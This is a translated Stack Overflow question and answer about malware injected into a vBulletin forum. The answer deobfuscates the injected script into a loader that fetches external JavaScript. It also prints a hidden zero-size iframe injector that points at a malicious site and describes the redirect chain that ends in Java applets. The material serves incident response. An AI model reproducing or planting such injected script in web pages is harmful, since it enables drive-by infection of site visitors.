我的网站3dsforums.com被标记为包含恶意软件的攻击站点。根据Google网站管理员工具,这是已注入每个页面的可疑代码:
<script>eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c ]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('3 1=4.5(\'6\');1.7=\'8://9-a.b/ c.d.1\';3 2=4.e(\'2\')[0];2.f(1);',16,16,'|js|head|var|document|createElement|script|src|http|javascript|collection|in|jquery|compatibility|getElementsByTagName|appendChild'.split('|'),0,{}))</script>
因此,我有两个问题:
这实际上是违规代码吗?
以及如何删除它?
我似乎无法通过vBulletin中的模板或通过phpmyadmin找到它,因此我不知道该怎么做。
谢谢你的帮助。
最佳答案
JS Beautifier将其解压缩为:
var js = document.createElement('script');
js.src = 'http://javascript-collection.in/ jquery.compatibility.js';
var head = document.getElementsByTagName('head')[0];
head.appendChild(js);
它看起来可疑(谁会混淆?),所以我认为是的,这是问题所在,您应该删除它。
编辑:现在已经备份了恶意站点,我可以分析其余部分:它似乎添加了
iframe:var iframe = document.createElement('iframe');
iframe.src = 'http://gamessilver.in/in.cgi?walter';
iframe.width = 0;
iframe.height = 0;
iframe.vspace = 0;
iframe.hspace = 0;
iframe.frameborder = 0;
iframe.marginheight = 0;
iframe.marginwidth = 0;
var head = document.getElementsByTagName('head')[0];
head.appendChild(iframe);
将其附加到
head有点奇怪。如果
in.cgi不太容易被利用,则User-Agent脚本似乎会重定向到Google。否则,它将重定向到另一个恶意网站。它继续分支许多
iframe。他们中的许多人什么都不做(尽管那时,我只是在WinXP上尝试使用MSIE 6的User-Agent),但最终我最终遇到了两个Java小程序。当我对它们进行反编译时,所有名称都被弄乱了,而且我也不想去弄清楚它在做什么。关于javascript - 从网站删除恶意软件,我们在Stack Overflow上找到一个类似的问题:https://stackoverflow.com/questions/9154004/